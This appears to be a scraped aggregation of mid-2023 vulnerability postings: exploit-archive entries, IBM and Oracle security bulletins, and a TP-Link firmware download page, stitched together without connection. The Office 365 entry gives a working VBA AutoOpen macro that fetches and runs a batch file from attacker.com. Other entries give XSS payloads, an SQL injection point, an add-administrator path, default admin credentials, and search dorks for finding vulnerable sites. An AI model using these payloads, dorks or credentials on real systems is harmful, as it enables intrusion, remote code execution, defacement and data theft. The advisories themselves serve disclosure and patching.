Microsoft Office 365 version 18.2305.1222.0 suffers from a remote code execution vulnerability when a malicious link is clicked on in a Word file.

    ## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation ofPrivilege Vulnerability + RCE.## Author: nu11secur1ty## Date: 07.18.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office## Reference: https://portswigger.net/web-security/access-control## CVE-2023-33148## Description:The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable toElevation of Privilege.The attacker can use this vulnerability to attach a very maliciousWORD file in the Outlook app which is a part of Microsoft Office 365and easily can trick the victim to click on it - opening it andexecuting a very dangerous shell command, in the background of thelocal PC. This execution is without downloading this malicious file,and this is a potential problem and a very dangerous case! This can bethe end of the victim's PC, it depends on the scenario.WARNING! Office 365 executes files directly from Outlook, without tempdownloading, security checking and etc.## Staus: HIGH Vulnerability[+]Exploit:- - - NOTE:This exploit is connected to the third-party server, and when thevictim clicks on it and opens it the content of the script which isinside will fetch on the machine locally and execute himself by usingMS Office 365 and Outlook app which is a part of the 365 API.```vbSub AutoOpen()  Call Shell("cmd.exe /S /c" & "curl -shttps://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat&& .\salaries.bat", vbNormalFocus)End Sub```## Reproduce:[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)## Time spend:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Microsoft Office 365 18.2305.1222.0 Remote Code Execution

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

**Clip Share 4.1.4 Cross Site Scripting**

Posted Jul 19, 2023

Authored by indoushka

Clip Share version 4.1.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | f104b1e9de39e7d0bb70da284aab85d83380acd95357f1cdeaf43197d30dc724

Download | Favorite | View

**Clip Share 4.1.4 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Clip Share 4.1.4 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.clip-share.com/                                                                                         || # Dork      : Powered By ClipShare                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Xss :   This vulnerability affects /ClipShare/signup.    URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="   The input is reflected inside a tag parameter between double quotes.   URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="   The input is reflected inside a tag parameter between double quotes.Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,696)
*   Arbitrary (16,150)
*   BBS (2,859)
*   Bypass (1,732)
*   CGI (1,025)
*   Code Execution (7,233)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,342)
*   Encryption (2,365)
*   Exploit (51,589)
*   File Inclusion (4,207)
*   File Upload (963)
*   Firewall (821)
*   Info Disclosure (2,752)
*   Intrusion Detection (890)
*   Java (3,009)
*   JavaScript (851)
*   Kernel (6,639)
*   Local (14,427)
*   Magazine (586)
*   Overflow (12,638)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,649)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,635)
*   Security Tool (7,873)
*   Shell (3,172)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,195)
*   SQL Injection (16,299)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,691)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,849)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,792)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,198)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,565)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,751)
*   UNIX (9,266)
*   UnixWare (186)
*   Windows (6,562)
*   Other

Clip Share 4.1.4 Cross Site Scripting

Ciuis CRM version 1.0.8 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : Ciuis™ CRM v1.0.7 add administrator Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://codelist.cc/php-script/233000-ciuis-crm-v107.html                                                          || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] suffers from an add administrator vulnerability because after the first installation, the installation file repeats the installation process.[+] use payload 01 : /install/app/pages/complete.php  [+] use payload 02 : /install/app/pages/requirements.php [+] http://127.0.0.1/drmcrmcom/install/app/pages/complete.php   [+] http://127.0.0.1/drmcrmcom/install/app/pages/requirements.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Ciuis CRM 1.0.8 Add Administrator

IBM Sterling Connect:Express for UNIX 1.5 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.  IBM X-Force ID:  252135.

  

**Summary**

IBM Sterling Connect:Express for UNIX is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.

**Vulnerability Details**

**CVEID:**   CVE-2023-29260  
**DESCRIPTION:**   IBM Sterling Connect:Express for UNIX is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/252135 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

Sterling Connect:Express for UNIX

1.5.x

**Remediation/Fixes**

Upgrade to Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.12 available on Fix Central

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

11 Jul 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS3JSW","label":"IBM Sterling B2B Integrator"},"Component":"Sterling Connect:Express Adapter for Sterling B2B Integrator","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"}\],"Version":"5.2","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2023-29260: Express for UNIX is vulnerable to server-side request forgery (SSRF)

IBM InfoSphere Information Server 11.7 could allow an authenticated user to obtain sensitive information due to an insecure security configuration in InfoSphere Data Flow Designer.  IBM X-Force ID:  259352.

  

**Summary**

DataStage Flow Designer is an internal component of IBM InfoSphere Information Server. An information disclosure vulnerability in the DataStage Flow Designer was addressed.

**Vulnerability Details**

**CVEID:**   CVE-2023-35898  
**DESCRIPTION:**   IBM InfoSphere Information Server could allow an authenticated user to obtain sensitive information due to an insecure security configuration in InfoSphere Data Flow Designer.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/259352 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

InfoSphere Information Server

11.7

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

17 Jul 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSZJPZ","label":"IBM InfoSphere Information Server"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"}\],"Version":"11.7","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-35898: Security Bulletin: IBM InfoSphere Information Server is affected by an information disclosure vulnerability (CVE-2023-35898)

Vulnerability in the Oracle Hyperion Financial Reporting product of Oracle Hyperion (component: Repository).   The supported version that is affected is 11.2.13.0.000. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hyperion Financial Reporting.  While the vulnerability is in Oracle Hyperion Financial Reporting, attacks may significantly impact additional products (scope change).  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle Hyperion Financial Reporting accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hyperion Financial Reporting. CVSS 3.1 Base Score 8.5 (Confidentiality and Availability impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L).

CVE-2023-22062: Oracle Critical Patch Update Advisory - July 2023

TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data.

**Utility**

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2022-02-21

Language: English

File Size: 1.75 MB

Operating System: Mac OS 10.15/11.x/12.x

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2018-10-29

Language: English

File Size: 2.53 MB

Operating System: Mac OS 10.9-10.14

USB\_Printer\_Controller\_Utility\_Windows

Download

Published Date: 2016-11-18

Language: English

File Size: 9.62 MB

Operating System: WinXP/Vista/7/8/8.1/10

Archer C2\_V1\_Easy Setup Assistant\_140218

Download

Published Date: 2014-02-18

Language: English

File Size: 6.78 MB

Operating System: WinXP/Vista/7/8

**Setup Video**

*   **How to Resolve Double NAT using Starlink**
*   **How to Configure a TP-Link Router with Starlink**
*   **How to Set up Address Reservation on TP-Link Routers Windows**
    
    This video will show you how to set up Address Reservation on TP-Link routers.
    
    More Fold
    
*   **How to Set up OpenVPN on TP-Link Routers Windows**
    
    This video will show you how to set up OpenVPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a DSL modem and a TP-Link router**
    
    If you can’t access the internet using a DSL modem and TP-Link router, this video can help you solve the problem.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a cable modem and a TP-Link router**
    
    If you can’t access the internet using a cable modem and TP-Link router, follow this video step by step to solve your problem.
    
    More Fold
    
*   **How to turn a router into an Access Point?**
*   **How to set up Port Forwarding on a TP-Link router**
    
    Take Archer A7 as demonstration.
    
    More Fold
    
*   **How to set Parental Controls on a TP-Link router**
    
    Take Archer A9 as demonstration.
    
    More Fold
    
*   **How to change the Wi-Fi settings on TP-Link router**

**Firmware**

A firmware update can resolve issues that the previous firmware version may have and improve its current performance.

**To Upgrade**

**IMPORTANT:** To prevent upgrade failures, please read the following before proceeding with the upgrade process

*   **Please upgrade firmware from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it will be against the warranty. Please click here to change site if necessary.**
*   Please verify the hardware version of your device for the firmware version. Wrong firmware upgrade may damage your device and void the warranty. (**Normally Vx.0=Vx.6/Vx.8 (eg:V1.0=V1.6/V1.8);   Vx.x0=Vx.x6/Vx.x8 (eg:V1.20=V1.26/V1.28)**  
    How to find the hardware version on a TP-Link device
*   **Do NOT turn off the power during the upgrade process, as it may cause permanent damage to the product.**
*   To avoid wireless disconnect issue during firmware upgrade process, it's recommended to upload firmware with wired connection unless there is no LAN/Ethernet port on your TP-Link device.
*   It's recommended that users stop all Internet applications on the computer, or simply disconnect Internet line from the device before the upgrade.
*   Use decompression software such as WinZIP or WinRAR to extract the file you download before the upgrade.

More Fold

Archer C2(US)\_V1\_170228

Download

Published Date: 2017-02-28

Language: English

File Size: 6.69 MB

Modifications and Bug Fixes:

New Features/Enhancement:  
Optimized the security mechanism.

Bug fixed:  
1\. Fixed the bug that some IPv6 websites can't be accessed in some special scenarios.  
2\. Fixed the bug that the device would be unable to access internet when special IP address and gateway are offered by ISP.

Notes:

1\. For Archer C2(US)\_V1.  
2\. It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_V1\_160606

Download

Published Date: 2016-06-06

Language: English

File Size: 6.53 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the function to filter the https website.  
2\. Improved the 2.4GHz wireless capability.  
3\. Enhanced the security mechanism.  
4\. Optimized the performance of IPv6 connection.

Bug Fixed：  
1\. Fixed the bug that the the delay is higher than normal when trying to Ping the LAN IP of the device.  
2\. Fixed the bug that the media server would display but fail to use the sharing files even you've already deleted the last folder.  
3\. Fixed the bug that some repeaters may fail to renew IP address normally with it.  
4\. Fixed the bug that PPPoE connection may fail to be connected in some special scenario.

Notes:

1\. For Archer C2(US)\_V1  
2\.  It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_v1\_160128

Download

Published Date: 2016-01-28

Language: English

File Size: 6.57 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the conflict detection function of DNS and LAN IP.  
2\. Enhance the performance for multicast.   
3\. The switch of DOS won't affect the Ping function of WAN and LAN any more.  
Bug Fixed：  
The LED light would keep flashing if the USB device is unplugged when scanning.

Notes:

1.For Archer C2(US)1.0  
2.If you’re in a region out of United States, please do not upgrade US firmware.Click here to choose your region for the most suitable firmware.

**To Use Third Party Firmware In TP-Link Products**

Some official firmware of TP-Link products can be replaced by the third party firmware such as DD-WRT. TP-Link is not obligated to provide any maintenance or support for it, and does not guarantee the performance and stability of third party firmware. Damage to the product as a result of using third party firmware will void the product's warranty.

**Open Source Code For Programmers (GPL)**

Please note: The products of TP-Link partly contain software code developed by third parties, including software code subject to the GNU General Public Licence (“GPL“), Version 1/Version 2/Version 3 or GNU Lesser General Public License ("LGPL"). You may use the respective software condition to following the GPL licence terms.

You can review, print and download the respective GPL licence terms here. You receive the GPL source codes of the respective software used in TP-Link products for direct download and further information, including a list of TP-Link software that contain GPL software code under GPL Code Center.

The respective programs are distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the respective GNU General Public License for more details.

**Apps**

TP-Link Tether

TP-Link Tether provides the easiest way to access and manage your network with your iOS or Android devices. Learn more about TP-Link Tether and Compatible Devices

Note: To use Tether, please update your TP-Link device's firmware to the latest version.

**Emulators**

Firmware Version

Working Mode

Language

140218

\-

English

Browse

**Note:**

1\.  The emulator is a virtual web GUI where you can experience the TP-Link product management panel.

2\. The listed emulators might not have the latest firmware.

3\.  The features displayed are for reference, and their availability may depend on local regulations. For more information, please refer to the datasheet or product page.

CVE-2023-30383: Download for  Archer C2 | TP-Link

CCOM Events CMS version 0.1.02 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CCOM Events CMS v0.1.02 Sql injecion Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.cyberunivers.com/                                                                                       |  | # Dork      : "details_news.php?id_news= "                                                                                       |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : details_news.php?id_news=[+]  http://127.0.0.1/samereorg/samere2/site/details_news.php?id_news=16 <==== inject here Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CCOM Events CMS 0.1.02 SQL Injection

Catpops Technobiz CMS version 4.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Catpops Technobiz CMS v4.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://catpops.in                                                                                                 |  | # Dork      : intext:''Designed By Catpops Technobiz''                                                                           |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /read_article_details.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E[+]  http://127.0.0.1/holyheartsin/read_article_details.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E[+]  http://127.0.0.1/holyheartsin/alumini.php?choice=success&value=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Catpops Technobiz CMS 4.0 Cross Site Scripting

Carbiz Buy Sell Car Marketplace Script version 1.2.0 appears to leave default credentials installed after installation.

    ======================================================================================================================================| # Title     : Carbiz - Buy Sell Car Marketplace Script V 1.2.0 Insecure Settings Vulnerability                                     || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              || # Vendor    : https://codecanyon.net/item/carbiz-buy-sell-car-marketplace-script/21803782                                          |  | # Dork      : "© Copyright 2018 Webhelios . All rights reserved"                                                                   |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin & Pass : 12345[+]  Panel http://127.0.0.1/veloxcarsalescom/index.php/en/admin/authGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows